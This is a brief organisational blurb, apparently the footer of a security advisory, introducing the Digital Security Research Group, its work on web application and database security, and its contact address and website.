Digital Security Research Group focuses on web application and database
security
problems with vulnerability reports, advisories and whitepapers posted
regularly
on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
